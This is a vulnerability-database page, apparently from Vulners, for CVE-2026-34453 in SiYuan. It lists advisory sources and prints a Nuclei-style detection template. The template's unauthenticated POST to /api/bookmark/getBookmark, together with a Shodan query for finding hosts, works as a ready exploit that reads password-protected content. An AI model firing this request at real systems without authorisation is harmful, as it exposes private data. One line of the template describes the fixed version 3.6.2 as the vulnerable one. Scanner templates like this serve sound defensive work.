| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2026-34453 | 31 Mar 202621:43 | – | attackerkb | |
| CVE-2026-34453 | 28 Mar 202611:39 | – | circl | |
| SiYuan 安全漏洞 | 31 Mar 202600:00 | – | cnnvd | |
| CVE-2026-34453 | 31 Mar 202621:43 | – | cve | |
| CVE-2026-34453 SiYuan: Broken access control in /api/bookmark/getBookmark allows unauthenticated publish visitors to read password-protected bookmarked content | 31 Mar 202621:43 | – | cvelist | |
| EUVD-2026-17683 | 31 Mar 202621:43 | – | euvd | |
| SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark | 31 Mar 202623:30 | – | github | |
| CVE-2026-34453 | 31 Mar 202622:16 | – | nvd | |
| CVE-2026-34453 SiYuan: Broken access control in /api/bookmark/getBookmark allows unauthenticated publish visitors to read password-protected bookmarked content | 31 Mar 202621:43 | – | osv | |
| GHSA-C77M-R996-JR3Q SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark | 31 Mar 202623:30 | – | osv |
id: CVE-2026-34453
info:
name: SiYuan <= v3.6.1 - Bookmark Data Disclosure
author: 0x_Akoko
severity: high
description: |
SiYuan v3.6.2 contains an information disclosure vulnerability caused by improper authorization checks in the publish service's bookmark filtering, letting unauthenticated visitors access bookmarked blocks from password-protected documents, exploit requires access to the publish service.
impact: |
Unauthenticated attackers can access content from protected documents without a password, exposing sensitive information
remediation: |
Update to version 3.6.2 or later.
reference:
- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q
- https://nvd.nist.gov/vuln/detail/CVE-2026-34453
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-34453
epss-score: 0.01227
epss-percentile: 0.65221
cwe-id: CWE-863
metadata:
verified: true
max-request: 2
vendor: siyuan-note
product: siyuan
shodan-query: http.favicon.hash:-1450125239
tags: cve,cve2026,siyuan,unauth,disclosure,bac
flow: http(1) && http(2)
http:
- method: POST
path:
- "{{BaseURL}}/api/system/version"
matchers:
- type: dsl
internal: true
dsl:
- 'status_code == 200'
- 'compare_versions(ver, ">= 0.0.1", "<= 3.6.1")'
condition: and
extractors:
- type: json
name: ver
internal: true
json:
- '.data'
- raw:
- |
POST /api/bookmark/getBookmark HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"code":0'
- '"type":"bookmark"'
- '"blocks"'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100b876f5bc42961087bbe374ff04ea5e72f2ae18f34932e62234b75997ba24818702201a9212105523b9a6637b21c0cd3f27b45ad14a17a473e8097b33aed9065eab2f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation